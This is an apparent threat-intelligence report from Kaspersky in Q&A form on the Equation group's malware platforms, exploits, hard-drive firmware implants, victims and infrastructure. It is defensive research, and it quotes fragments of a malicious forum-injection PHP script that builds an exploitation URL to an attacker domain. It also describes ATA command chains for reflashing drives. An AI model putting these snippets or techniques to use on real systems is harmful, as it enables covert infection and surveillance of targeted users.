# EQUATION GROUP: QUESTIONS AND ANSWERS Version: 1.5 February 2015 [#EquationAPT](https://twitter.com/hashtag/equationapt) [#TheSAS2015](http://sas.kaspersky.com/) ----- 2 ## Table of contents 1. What is the Equation group?...........................................................................3 2. Why do you call them the “Equation” group?.................................................3 3. What attack tools and malware does the Equation group use?...................4 4. What is DOUBLEFANTASY?.............................................................................6 5. What is EQUATIONDRUG?...............................................................................8 6. What is GRAYFISH?..........................................................................................9 7. What is Fanny?.............................................................................................. 12 8. What exploits does the Equation group use?.............................................. 14 9. How do victims get infected by EQUATION group malware?....................... 15 10. What is the most sophisticated thing about the EQUATION group?.......... 16 11. Have you observed any artifacts indicating who is behind the EQUATION group?................................................................................... 19 12. How many victims are there?....................................................................... 20 13. Have you seen any non-Windows malware from the Equation group?...... 22 14. What C&C infrastructure do the Equation group implants use?................ 23 15. How do victims get selected for infection by the EQUATION group?.......... 23 16. What kind of encryption algorithms are used by the EQUATION group?.... 27 17. How does the EQUATION group’s attack platforms compare with Regin?.................................................................................... 30 18. How did you discover this malware?........................................................... 31 Indicators of compromise (“one of each”).......................................................... 32 ----- 3 ## 1. What is the Equation group? The Equation group is a highly sophisticated threat actor that has been engaged in multiple CNE (computer network exploitation) operations dating back to 2001, and perhaps as early as 1996. The Equation group uses multiple malware platforms, some of which surpass the well-known “Regin” threat in complexity and sophistication. The Equation group is probably one of the most sophisticated cyber attack groups in the world; and they are the most advanced threat actor we have seen. ## 2. Why do you call them the “Equation” group? We call this threat actor the Equation group because of their love for encryption algorithms and obfuscation strategies and the sophisticated methods used throughout their operations. In general, the Equation group uses a specific implementation of the RC5 encryption algorithm throughout their malware. Some of the most recent modules use RC6, RC4 and AES too, in addition to other cryptographic functions and hashes. One technique in particular caught our attention and reminded us of another complex malware, Gauss. The GrayFish loader uses SHA-256 one thousand times over the unique NTFS object ID of the victim’s Windows folder to decrypt the next stage from the registry. This uniquely ties the infection to the specific machine, and means the payload cannot be decrypted without knowing the NTFS object ID. ----- 4 ## 3. What attack tools and malware does the Equation group use? So far, we’ve identified several malware platforms used exclusively by the Equation group. They are: - EQUATIONDRUG – A very complex attack platform used by the group on its victims. It supports a module plugin system, which can be dynamically uploaded and unloaded by the attackers. - DOUBLEFANTASY – A validator-style Trojan, designed to confirm the target is the intended one. If the target is confirmed, they get upgraded to a more sophisticated platform such as EQUATIONDRUG or GRAYFISH. - EQUESTRE – Same as EQUATIONDRUG. - TRIPLEFANTASY – Full-featured backdoor sometimes used in tandem with GRAYFISH. Looks like an upgrade of DOUBLEFANTASY, and is possibly a more recent validator-style plugin. - GRAYFISH – The most sophisticated attack platform from the EQUATION group. It resides completely in the registry, relying on a bootkit to gain execution at OS startup. - FANNY – A computer worm created in 2008 and used to gather information about targets in the Middle East and Asia. Some victims appear to have been upgraded first to DoubleFantasy, and then to the EQUATIONDRUG system. Fanny used exploits for two zero-day vulnerabilities which were later discovered with Stuxnet. - EQUATIONLASER – An early implant from the EQUATION group, used around 2001-2004. Compatible with Windows 95/98, and created sometime between DOUBLEFANTASY and EQUATIONDRUG. ----- 5 ----- 6 ## 4. What is DOUBLEFANTASY? The Equation group uses an implant known as DoubleFantasy (the internal Kaspersky Lab name) for the validation of their victims. The implant serves two purposes: - to confirm if the victim is interesting; If so, the victim is upgraded to the EquationDrug or GrayFish platforms - to keep a backdoor into a potentially interesting target’s computer DoubleFantasy keeps an internal version number in its configuration block, together with other data such as legitimate hosts used to validate the internet connection (e.g.: microsoft.com, yahoo.com) and C&Cs. Decrypted DoubleFantasy configuration block In the configuration block above, one can easily spot the internal version 8.2.0.6. Decrypting configuration blocks from all known DoubleFantasy samples, we obtained the following internal version numbers: - `8.1.0.4` - `008.002.000.006` - `008.002.001.001` - `008.002.001.004` - `008.002.001.04A (subversion “IMIL3.4.0-IMB1.8.0”)` - `008.002.002.000` - `008.002.003.000` - `008.002.005.000` - `008.002.006.000` ----- 7 - `011.000.001.001` - `012.001.000.000` - `012.001.001.000` - `012.002.000.001` - `012.003.001.000` - `012.003.004.000` - `012.003.004.001` - `013.000.000.000` Interestingly, the most popular versions are 8 and 12: Considering the latest version of DoubleFantasy is 13 and we have only identified 4 major versions, we are probably seeing only a small part of the group’s activity. ----- 8 ## 5. What is EQUATIONDRUG? EQUATIONDRUG is one of the group’s most complex espionage platforms. The platform was developed between 2003 and 2013 and subsequently replaced by GrayFish. It appears to have been created as an upgrade from the EQUATIONLASER platform. A victim doesn’t immediately get infected with EQUATIONDRUG. First, the attackers infect them with DOUBLEFANTASY, which is a validator-style plugin. If the victim is confirmed as interesting to the attackers, the EQUATIONDRUG installer is delivered. By default, a core set of modules is installed onto the target’s computer together with EQUATIONDRUG, giving attackers full control over the operating system. In cases where the basic features of the malware are not enough, EquationDrug supports the addition of new plugins to extend its functionality. We found 35 different plugins for EquationDrug and 18 drivers. ----- 9 EquationDrug’s core modules, designed for hooking deep into the OS, do not contain a trusted digital signature and cannot be run directly on modern operating systems. The code checks whether the OS version predates Windows XP/2003. Some of the plugins were designed originally for use on Windows 95/98/ME. If the target is using a modern operating system such as Windows 7, the attackers use the TripleFantasy or GrayFish platforms. EquationDrug has an integrated countdown timer, presumably designed to selfdestruct if commands are not received from the C&C for a period of time (several months). The information stolen from the PC and prepared for transmission to the C&C is stored in encrypted form throughout several fake font files (*.FON) inside the Windows\Fonts folder on the victim's computer. ## 6. What is GRAYFISH? GRAYFISH is the most modern and sophisticated malware implant from the Equation group. It is designed to provide an effective (almost “invisible”) persistence mechanism, hidden storage and malicious command execution inside the Windows operating system. By all indications, GrayFish was developed between 2008 and 2013 and is compatible with all modern versions of Microsoft’s operating systems, including Windows NT 4.0, Windows 2000, Windows XP, Windows Vista, Windows 7 and 8 – both 32-bit and 64-bit versions. ----- 10 GrayFish includes a highly sophisticated bootkit, which is more complex than any we’ve seen before. This suggests developers of the highest caliber are behind its creation. When the computer starts, GrayFish hijacks the OS loading mechanisms by injecting its code into the boot record. This allows it to control the launching of Windows at each stage. In fact, after infection, the computer is not run by itself more: it is GrayFish that runs it step by step, making the necessary changes on the fly. After GrayFish starts Windows, it launches a multi-stage mechanism (four to five stages) of decryption to achieve code execution within the Windows environment. It then runs the functional modules that are stored inside the Windows registry. Each stage decodes and executes the next, and the entire platform will only start after successful execution of all levels If an error happens during launch the ----- 11 ----- 12 To store stolen information, as well as its own auxiliary information, GrayFish implements its own encrypted Virtual File System (VFS) inside the Windows registry. To bypass modern OS security mechanisms that block the execution of untrusted code in kernel mode, GrayFish exploits several legitimate drivers, including one from the CloneCD program. This driver (ElbyCDIO.sys) contains a vulnerability which GrayFish exploits to achieve kernel-level code execution. Despite the fact that the [vulnerability was discovered in 2009, the digital signature has not yet been revoked.](http://www.securitylab.ru/lab/PT-2009-11) The GrayFish implementation appears to have been designed to make it invisible to antivirus products. When used together with the bootkit, all the modules as well as the stolen data are stored in encrypted form in the registry and dynamically decrypted and executed. There are no malicious executable modules at all on the filesystem of an infected system. An interesting observation: the first stage GRAYFISH loader computes the SHA-256 hash of the NTFS of system folder (%Windows% or %System%) Object_ID one thousand times. The result is used as an AES decryption key for the next stage. This is somewhat similar to Gauss, which computed the MD5 hash over the name of its target folder 10,000 times and used the result as the decryption key. ## 7. What is Fanny? Fanny is a computer worm created by the Equation group in 2008 and distributed throughout the Middle East and Asia. Fanny used two zero-day exploits, which were later uncovered during the discovery of Stuxnet. To spread, it used the Stuxnet LNK exploit and USB sticks. For escalation of privilege, Fanny used a vulnerability patched by the Microsoft bulletin MS09-025, which from 2009 was also used in one of the early versions of Stuxnet. ----- 13 It’s important to point out that these two exploits were used in Fanny before they were integrated into Stuxnet, indicating the EQUATION group had access to these zero-days before the Stuxnet group. Actually, the similar type of usage of both exploits together in different computer worms, at around the same time, indicates that the EQUATION group and the Stuxnet developers are either the same or working closely together. Fanny malware diagram The main purpose of Fanny appears to have been the mapping of air-gapped networks. For this, it used a unique USB-based command and control mechanism. When a USB stick is infected, Fanny creates a hidden storage area on the stick. If it infects a computer without an internet connection, it will collect basic system information and save it onto the hidden area of the stick. Later, when a stick containing hidden information is plugged into an internet-connected computer infected by Fanny, the data will be scooped up from the hidden area and sent to the C&C. If the attackers want to run commands on the air-gapped networks, they can save these commands in the hidden area of the USB stick When the stick is ----- 14 execute them. This effectively allowed the Equation group to run commands inside air-gapped networks through the use of infected USB sticks, and also map the infrastructure of such networks. The Fanny C&C server is currently sinkholed by Kaspersky Lab. The victims map looks as follows: 2014-2015 Fanny sinkhole statistics ## 8. What exploits does the Equation group use? We observed the following exploits used by the Equation group in their malware: - Windows Kernel EoP exploit used in Stuxnet 2009 (atempsvc.ocx), fixed with MS09-025. (CVE unknown). - TTF exploit fixed with MS12-034 (possibly CVE-2012-0159). - TTF exploit fixed with MS13-081 (possibly CVE-2013-3894). - LNK vulnerability as used by Stuxnet. (CVE-2010-2568). - CVE-2013-3918 (Internet Explorer). ----- 15 - CVE-2012-1723 (Java). - CVE-2012-4681 (Java). At least four of these were used as zero-days by the EQUATION group. In addition to these, we observed the use of unknown exploits, possibly zero-day, against Firefox 17, as used in the TOR Browser. An interesting case is the use of CVE-2013-3918, which was originally used by the APTgroup behind the 2009 Aurora attack. The EQUATION group captured their exploit and repurposed it to target government users in Afghanistan. ## 9. How do victims get infected by EQUATION group malware? The Equation group relies on multiple techniques to infect their victims. These include: - Self-replicating (worm) code – Fanny - Physical media, CD-ROMs - USB sticks + exploits - Web-based exploits The attacks that use physical media (CD-ROMs) are particularly interesting because they indicate the use of a technique known as “interdiction”, where the attackers intercept shipped goods and replace them with Trojanized versions. One such incident involved targeting participants at a scientific conference in Houston. Upon returning home, some of the participants received by mail a copy of the conference proceedings, together with a slideshow including various conference materials. The compromised CD-ROM used “autorun.inf” to execute an installer that began by attempting to escalate privileges using two known EQUATION group exploits. Next, it attempted to run the group’s DOUBLEFANTASY implant and install it onto the victim’s machine. The exact method by which these CDs were interdicted is unknown. We do not believe the conference organizers did this on purpose. At the same time, the super-rare DOUBLEFANTASY malware, together with its installer with two zero-day exploits, don’t end up on a CD by accident. Another example is a Trojanized Oracle installation CD that contains ----- 16 Here’s a look at a typical infection cycle: Infection lifecycle: from web exploit to EquationDrug and GrayFish ## 10. What is the most sophisticated thing about the EQUATION group? Although the implementation of their malware systems is incredibly complex, surpassing even Regin in sophistication, there is one aspect of the EQUATION group’s attack technologies that exceeds anything we have ever seen before. This is the ability to infect the hard drive firmware. We were able to recover two HDD firmware reprogramming modules from the EQUATIONDRUG and GRAYFISH platforms. The EQUATIONDRUG HDD firmware reprogramming module has version 3.0.1 while the GRAYFISH reprogramming module has version 4.2.0. These were compiled in 2010 and 2013, respectively, if we are to trust the PE timestamps. ----- 17 The EQUATION group HDD firmware reprogramming plugin has the internal ID 80AA, which is a unique number in the groups’ plugin ID table. This allows other plugins to identify and use it as required. Both 32- and 64-bit versions of the plugin were found. The plugin supports two main functions: reprogramming the HDD firmware with a custom payload from the EQUATION group, and providing an API into a set of hidden sectors (or data storage) of the hard drive. This achieves several important things: - Extreme persistence that survives disk formatting and OS reinstall. - An invisible, persistent storage hidden inside the hard drive. The plugin version 3 has the ability to reprogram six drive “categories”: - “Maxtor”, “Maxtor STM” - “ST”, “Maxtor STM”, - “WDC WD”, - “SAMSUNG”, - “WDC WD”, additional vendor specific checks used (spawns two subclasses) - The plugin version 4 is more complex and can reprogram 12 drive “categories”. ----- 18 The classes supported are: - “WDC WD”, additional vendor specific checks used - “ST”, “Maxtor STM”, “SEAGATE ST”, - “SAMSUNG”, - “WDC WD”, additional vendor specific checks used - , “IC”, “IBM”, “Hitachi”, “HTS”, “HTE”, “HDS”, “HDT”, “ExcelStor” - “Max”, “Maxtor STM” - , “C300”, “M4” - , - “OCZ”, “OWC”, “Corsair”, “Mushkin” additional vendor specific checks used - , , +additional checks - , “TOSHIBA M” +checks - , “ST” The main function to reflash the HDD firmware receives an external payload, which can be compressed by LZMA. The disk is targeted by a specific serial number and reprogrammed by a series of ATA commands. For example, in the case of Seagate drives, we see a chain of commands: “FLUSH CACHE” (E7) → “DOWNLOAD MICROCODE” (92) → “IDENTIFY DEVICE” (EC) → WRITE “LOG EXT” (3F). Depending on the reflashing request, there might be some unclear data manipulations written to the drive using “WRITE LOG EXT” (3F). For WD drives, there is a sub-routine searching for ARM NOP opcodes in read data, and then used further in following writes. Overall, the plugin uses a lot of undocumented, vendor-specific ATA commands, for the drives mentioned above as well as all the others. The EQUATION group’s HDD firmware reprogramming module is extremely rare. During our research, we’ve only identified a few victims who were targeted by this module. This indicates that it is probably only kept for the most valuable victims or for some very unusual circumstances. ----- 19 ## 11. Have you observed any artifacts indicating who is behind the EQUATION group? With threat actor groups as skilled as the Equation team, mistakes are rare. Nevertheless, they do happen. Some of the keywords forgotten in the modules that we analyzed include: - SKYHOOKCHOW - prkMtx – unique mutex used by the Equation group’s exploitation library (“PrivLib”) - “SF” – as in “SFInstall”, “SFConfig” - “UR”, “URInstall” – “Performing UR-specific post-install...” - “implant” – from “Timeout waiting for the “canInstallNow” event from the implant-specific EXE!” - STEALTHFIGHTER – (VTT/82055898/STEALTHFIGHTER/2008-10-16/14:59:06.229-04:00) - DRINKPARSLEY – (Manual/DRINKPARSLEY/2008-09-30/10:06:46.468-04:00) - STRAITACID – (VTT/82053737/STRAITACID/2008-09-03/10:44:56.361-04:00) - LUTEUSOBSTOS – (VTT/82051410/LUTEUSOBSTOS/2008-07-30/17:27:23.715-04:00) - STRAITSHOOTER STRAITSHOOTER30.exe - DESERTWINTER – c:\desert~2\desert~3\objfre_w2K_x86\i386\DesertWinterDriver.pdb - GROK – standalonegrok_2.1.1.1 - “RMGREE5” – c:\users\rmgree5\... ----- 20 Interestingly, the VTT strings above appear to contain a timestamp and an infection counter. Between four events – 10 October 2008, 30th of July 2008, 3rd of September 2008 and 30 of September 2008 – we count an average of 2000 infections per month, if the serial number increases linearly. This could indicate that the EQUATION group hits about 2000 users per month, although it’s possible some “uninteresting” victims may be disinfected. [Note: The codename GROK appears in several documents published by Der Spiegel,](http://www.itnews.com.au/News/374987,nsa-spreads-malware-on-an-industrial-scale.aspx) where “a keylogger” is mentioned. Our analysis indicates EQUATIONGROUP’s GROK plugin is indeed a keylogger on steroids that can perform many other functions. ## 12. How many victims are there? The victims of the Equation group were observed in more than 30 countries, including Iran, Russia, Syria, Afghanistan, Kazakhstan, Belgium, Somalia, Hong Kong, Libya, United Arab Emirates, Iraq, Nigeria, Ecuador, Mexico, Malaysia, United States, Sudan, Lebanon, Palestine, France, Germany, Singapore, Qatar, Pakistan, Yemen, Mali, Switzerland, Bangladesh, South Africa, Philippines, United Kingdom, India and Brazil. ----- 21 Victims generally fall into the following categories: - Governments and diplomatic institutions - Telecommunication - Aerospace - Energy - Nuclear research - Oil and gas - Military - Nanotechnology - Islamic activists and scholars - Mass media - Transportation - Financial institutions - Companies developing cryptographic technologies Combining statistics from KSN and our sinkhole, we counted more than 500 victims worldwide. A lot of infections have been observed on servers, often domain controllers, data warehouses, website hosting and other types of servers. At the same time, the infections have a self-destruct mechanism, so we can assume there were probably tens of thousands of infections around the world throughout the history of the Equation group’s operations. As an interesting note, some of the “patients zero” of Stuxnet seem to have been infected by the EQUATION group. It is quite possible that the EQUATION group malware was used to deliver the STUXNET payload. ----- 22 ## 13. Have you seen any non-Windows malware from the Equation group? All the malware we have collected so far is designed to work on Microsoft’s Windows operating system. However, there are signs that non-Windows malware does exist. For instance, one of the sinkholed C&C domains is currently receiving connections from a large pool of victims in China that appear to be Mac OS X computers (based on the user-agent). The malware callbacks are consistent with the DOUBLEFANTASY schema, which normally injects into the system browser (for instance, Internet Explorer on Windows). The callbacks for the suspected Mac OS X versions have the following user agents: - Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 - Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 - Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/536.28.10 (KHTML, like Gecko) Version/6.0.3 Safari/536.28.10 This leads us to believe that a Mac OS X version of DOUBLEFANTASY also exists. Additionally, we observed that one of the malicious forum injections, in the form of a PHP script, takes special precautions to show a different type of HTML code to Apple iPhone visitors. Unlike other cases, such as visitors from Jordan, which does not get targeted, iPhone visitors are redirected to the exploit server, suggesting the ability to infect iPhones as well. ----- 23 ## 14. What C&C infrastructure do the Equation group implants use? The Equation group uses a vast C&C infrastructure that includes more than 300 domains and more than 100 servers. The servers are hosted in multiple countries, including the US, UK, Italy, Germany, Netherlands, Panama, Costa Rica, Malaysia, Colombia and Czech Republic. All C&C domains appear to have been registered through the same two major registrars, using “Domains By Proxy” to mask the registrant’s information. Kaspersky Lab is currently sinkholing a couple dozen of the 300 C&C servers. ## 15. How do victims get selected for infection by the EQUATION group? The EQUATION group sometimes selects its victims with surgical precision. When precision is not possible, the victims are targeted by a validator (DOUBLEFANTASY) implant and subsequently disinfected if they do not appear to be “interesting” to the attackers. Here are some web-based targeting examples from the Equation group: On March 2, 2013, a Kaspersky Lab user browsing an online forum was attacked with an exploit from one of the Equation group’s exploitation servers: 2013-03-02 – technicalconsumerreports[.]com/modular/assemble.php?params=YoGKKdExT[snip] cS5kS5t0bvGQyB8miDu+Agn – detected HEUR:Exploit.Script.Generic The attack was unsuccessful as it was caught by our product and the user was protected. The attack was targeting Firefox 17 (TOR Browser), using an unknown exploit that we have not recovered. Looking further, we identified a few other known Equation servers used in similar attacks even earlier: ----- 24 These attacks were delivered in several ways – for example, while the user visited a number of Islamic Jihadist discussion forums, or via advertisements on popular websites in the Middle East. The forums in question appear to have been compromised by a specific PHP script that exploited only authenticated visitors. We were able to obtain one of these PHP scripts embedded in a discussion forum: Malicious PHP script injected into hacked discussion forums This PHP script provides a multitude of interesting information about the attacks. It was first designed to work as part of vBulletin, a commercial forum platform. It specifically checks if the visitor’s username MD5 matches two values: - 84b8026b3f5e6dcfb29e82e0b0b0f386 – MD5 of “Unregistered” - e6d290a03b70cfa5d4451da444bdea39 – unknown MD5 In practice, this means that only logged-in users will be exploited. Next, the PHP exploitation script checks if the user comes from a specific address range: - if(preg_match('/^(64.38.3.50|195.28.|94.102.|91.93.|41.130.|212.118.|7 9.173.|85.159.|94.249.|86.108.)/',IPADDRESS)){return "";} ----- 25 Converting the ranges to their respective countries (except for 64.38.3.50, which is the only specific IP mentioned) we get the following TOP 3 countries that will NOT be exploited: 1. Jordan 2. Turkey 3. Egypt This means that the attackers have taken special care not to infect users visiting from certain ISPs in these countries. If the visitors are from any other IP range, the PHP script constructs an exploitation URL which includes the logged in vBulletin forum name: $htt="http://technology-revealed[.]com/expand/order.php?design=ABRSRgDQlkUALAxGANDrRu QQofe6Y0THS8E3hfBC+M+k7CdBmTH5gAkLvgV8EV3ULW+7KoUjbJ4UOFU6SVOtgEK7zTgPPNoDH z4vKecDGe7OzDmJlvwKvc5uYg/I/5x9"; $htt=$htt."&sn=".bin2hex(substr($u,0,14)); The vBulletin forum username is stored in hex, as the “sn=” parameter to the exploit site. The exploit site can choose to hit the visitor with an exploit depending on the username, meaning that the attackers are taking great care to infect only very specific targets on these forums. Interestingly, the PHP script produces a different HTML page for iPhone visitors: - if (preg_match('/iPhone/',$_SERVER['HTTP_USER_AGENT'])){$scroll='yes';} This indicates that the exploit server is probably aware of iPhone visitors and can deliver exploits for them as well; otherwise, the exploitation URL can simply be removed for these visitors. Most recently, the attackers used Java exploits, delivered through a specific server to visitors from the Middle East via advertising networks on popular websites. Here’s an example: ----- 26 These 2013-2014 attacks make use of a new domain, standardsandpraiserepurpose[.]com. Interesting to point out the similarity in the URL construction, with parameters “rr=1”, followed by “h=” a value resembling a SHA1 hash, possibly the specific targeted username. Other collected “h=” values include the following: 0044c9bfeaac9a51e77b921e3295dcd91ce3956a 06cf1af1d018cf4b0b3e6cfffca3fbb8c4cd362e 3ef06b6fac44a2a3cbf4b8a557495f36c72c4aa6 5b1efb3dbf50e0460bc3d2ea74ed2bebf768f4f7 930d7ed2bdce9b513ebecd3a38041b709f5c2990 e9537a36a035b08121539fd5d5dcda9fb6336423 Considering the length and format, one might suspect they are a SHA1 hash, however, unlike the forum MD5 hashes, we couldn’t break any of them. The exploits from standardsandpraiserepurpose[.]com targeted several Kaspersky Lab users and were all unsuccessful. The server attempts three different Java exploits, containing the same payload stored as “info.dat” inside the Java archive. These are simple downloaders that contain shellcode to download and execute the next stage from the C&C: Unfortunately, we weren’t able to download a copy of the next stage as the URL was already dead at the time of checking, or else it is only served and built specifically for victims at specific IPs. Another unusual aspect of targeting included multiple infection attempts against users of a certain satellite internet provider in Afghanistan. ----- 27 ## 16. What kind of encryption algorithms are used by the EQUATION group? The Equation group uses the RC5 and RC6 encryption algorithms quite extensively throughout their creations. They also use simple XOR, substitution tables, RC4 and AES. RC5 and RC6 are two encryption algorithms designed by Ronald Rivest in 1994 and 1998. They are very similar to each other, with RC6 introducing an additional multiplication in the cypher to make it more resistant. Both cyphers use the same key setup mechanism and the same magical constants named P and Q. The RC5/6 implementation from Equation group’s malware is particularly interesting and deserves special attention because of its specifics. Encryption-related code in a DoubleFantasy sample In the screenshot above, one can observe the main loop of a RC6 key setup subroutine extracted from one of the Equation group samples. ----- 28 This is how it looks in pseudocode: *(_DWORD *)buf = 0xB7E15163; i = 1; do { *(_DWORD *)(buf + 4 * i) = *(_DWORD *)(buf + 4 * i – 4) – 0x61C88647; ++i; } while ( i < 44 ); One immediately notices the constants 0xB7E15163 and 0x61C88647. Here’s what a normal RC6 key setup code looks like: void RC5_SETUP(unsigned char *K) /* secret input key K[0...b-1] */ { WORD i, j, k, u=w/8, A, B, L[c]; /* Initialize L, then S, then mix key into S */ for (i=b-1,L[c-1]=0; i!=-1; i--) L[i/u] = (L[i/u]<<8)+K[i]; for (S[0]=0xB7E15163,i=1; i